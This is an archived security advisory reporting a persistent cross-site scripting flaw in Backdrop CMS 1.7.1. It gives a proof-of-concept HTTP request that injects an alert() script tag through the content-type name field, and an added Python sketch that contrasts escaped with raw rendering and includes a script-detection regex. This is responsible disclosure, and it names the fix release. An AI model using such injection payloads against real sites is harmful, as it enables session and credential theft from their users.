Backdrop CMS 1.7.1 Cross Site Scripting

2017-08-23T00:00:00
ID PACKETSTORM:143889
Type packetstorm
Reporter Manuel Garcia Cardenas
Modified 2017-08-23T00:00:00

Description

=============================================
MGC ALERT 2017-005  
- Original release date: July 11, 2017  
- Last revised: August 18, 2017  
- Discovered by: Manuel Garcia Cardenas  
- Severity: 4.8/10 (CVSS Base Score)
=============================================  
  
I. VULNERABILITY  
-------------------------  
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting  
  
II. BACKGROUND  
-------------------------  
Backdrop CMS is a simple, lightweight, and easy to use Content Management  
System used to build attractive, professional websites.  
  
III. DESCRIPTION  
-------------------------  
A persistent XSS vulnerability has been detected in Backdrop CMS that
allows arbitrary HTML/script code to be executed in the context of the
victim user's browser.
  
IV. PROOF OF CONCEPT  
-------------------------  
Go to: Structure -> Content types -> Add content type  
  
And post:  
  
POST /backdrop/admin/structure/types/add HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 605  
Referer: http://127.0.0.1/backdrop/admin/structure/types/add  
Cookie: Backdrop.tableDrag.showWeight=0;  
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;  
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;  
nv4_cltz=120.60.120%257C%252F%257C;  
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;  
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;  
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;  
gnew_language=english; gnew_template=clean;  
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields  
  
The "name" parameter is not sanitized. Later, if you open the created
content type and click "Manage Displays":
  
GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
  
The XSS is executed; in the response you can see:
  
Manage display</a></li></ul></div></div></td> </tr><tr class="header  
even"><td>Customized for test"><script>alert(/XSS/)</script></td><td  
class="priority-low"></td><td></td> </tr>  
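As an added illustration (not part of the advisory and not Backdrop's own code), the following Python model shows why the cell above ends up with live markup and what the escaped rendering looks like instead. format_string() here is a simplified stand-in for the Drupal-7-style placeholder convention Backdrop uses, where an "@key" placeholder is HTML-escaped on insertion and a "!key" placeholder is inserted verbatim; the sample name is the advisory's PoC value, URL-decoded, and the contains_active_markup() check is a regression test a maintainer could run over rendered fragments.

```python
import html
import re

# Constructed sample mirroring the advisory's PoC: the content type "name"
# value, URL-decoded from the POST body (name=test%22%3E%3Cscript%3E...).
CONSTRUCTED_NAME = 'test"><script>alert(/XSS/)</script>'


def format_string(template: str, args: dict) -> str:
    """Simplified stand-in (assumption, not Backdrop's code) for the
    Drupal-7-style placeholder convention: '@key' is HTML-escaped before
    insertion, '!key' is inserted verbatim and must only ever carry
    markup that is already safe."""
    out = template
    for key, value in args.items():
        if key.startswith("@"):
            out = out.replace(key, html.escape(value, quote=True))
        elif key.startswith("!"):
            out = out.replace(key, value)
        else:
            raise ValueError(f"unsupported placeholder prefix: {key}")
    return out


def render_customized_cell(name: str, escape: bool) -> str:
    """Render the 'Customized for ...' table cell from the advisory.
    escape=False models the vulnerable output (raw insertion of the
    stored name); escape=True is the hardened form (escaped placeholder)."""
    prefix = "@" if escape else "!"
    cell = format_string(f"Customized for {prefix}name", {f"{prefix}name": name})
    return "<td>" + cell + "</td>"


def contains_active_markup(fragment: str) -> bool:
    """Regression check over a rendered fragment: flags a real <script>
    tag or an on*= event-handler attribute. Entity-encoded text such as
    &lt;script&gt; does not match, so the escaped rendering passes."""
    pattern = r"<script\b|\bon[a-z]+\s*="
    return re.search(pattern, fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    for escape in (False, True):
        rendered = render_customized_cell(CONSTRUCTED_NAME, escape=escape)
        verdict = "UNSAFE" if contains_active_markup(rendered) else "safe"
        print(f"escape={escape}: {verdict}: {rendered}")
```

Running the block prints the vulnerable cell exactly as it appears in the response excerpt above, followed by the escaped cell in which the payload survives only as inert text.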
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as user
credentials, personal data, etc.
  
VI. SYSTEMS AFFECTED  
-------------------------  
Backdrop CMS <= 1.7.1  
  
VII. SOLUTION  
-------------------------  
Install the latest release:
https://github.com/backdrop/backdrop/releases/tag/1.7.2  
  
VIII. REFERENCES  
-------------------------  
https://backdropcms.org/security/backdrop-sa-core-2017-009  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
July 11, 2017 1: Initial release  
August 18, 2017 2: Last revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
July 11, 2017 2: Sent to vendor
August 17, 2017 3: Vendor fix in version 1.7.2
August 18, 2017 4: Sent to lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  